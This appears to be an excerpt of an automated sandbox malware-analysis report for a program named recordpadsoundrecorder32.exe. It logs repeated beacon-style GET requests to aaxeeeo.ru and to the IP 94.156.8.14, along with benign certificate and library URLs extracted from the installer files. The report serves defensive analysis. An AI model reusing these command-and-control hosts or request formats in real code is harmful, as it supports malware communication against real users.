                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficDNS traffic detected: DNS query: aaxeeeo.ru
                      Source: recordpadsoundrecorder32.exe, 00000004.00000002.3269409364.0000000000969000.00000004.00000020.00020000.00000000.sdmp, recordpadsoundrecorder32.exe, 00000004.00000002.3270365274.0000000003351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.8.14/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f8
                      Source: recordpadsoundrecorder32.exe, 00000004.00000002.3269409364.000000000095F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.8.14/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d
                      Source: is-UCHQL.tmp.1.drString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
                      Source: is-UCHQL.tmp.1.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
                      Source: is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                      Source: is-UCHQL.tmp.1.drString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
                      Source: is-UCHQL.tmp.1.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
                      Source: is-UCHQL.tmp.1.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                      Source: is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: is-VDBC5.tmp.1.drString found in binary or memory: http://lame.sf.net
                      Source: is-VDBC5.tmp.1.drString found in binary or memory: http://lame.sf.net32bits64bits
                      Source: is-VDBC5.tmp.1.drString found in binary or memory: http://lame.sf.netB
                      Source: is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.drString found in binary or memory: http://ocsp.sectigo.com0
                      Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drString found in binary or memory: http://ocsp.thawte.com0
                      Source: is-UCHQL.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0
                      Source: is-UCHQL.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0?
                      Source: is-UCHQL.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0Q
                      Source: is-KI2RB.tmp.1.drString found in binary or memory: http://qt-project.org/xml/features/report-start-end-entity
                      Source: is-KI2RB.tmp.1.drString found in binary or memory: http://qt-project.org/xml/features/report-whitespace-only-CharData
                      Source: is-8ECK7.tmp.1.drString found in binary or memory: http://qtav.org2
                      Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                      Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drString found in binary or memory: http://t2.symcb.com0
                      Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crl0
                      Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crt0
                      Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drString found in binary or memory: http://tl.symcd.com0&
                      Source: is-KI2RB.tmp.1.drString found in binary or memory: http://trolltech.com/xml/features/report-start-end-entity
                      Source: is-KI2RB.tmp.1.drString found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharData
                      Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                      Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
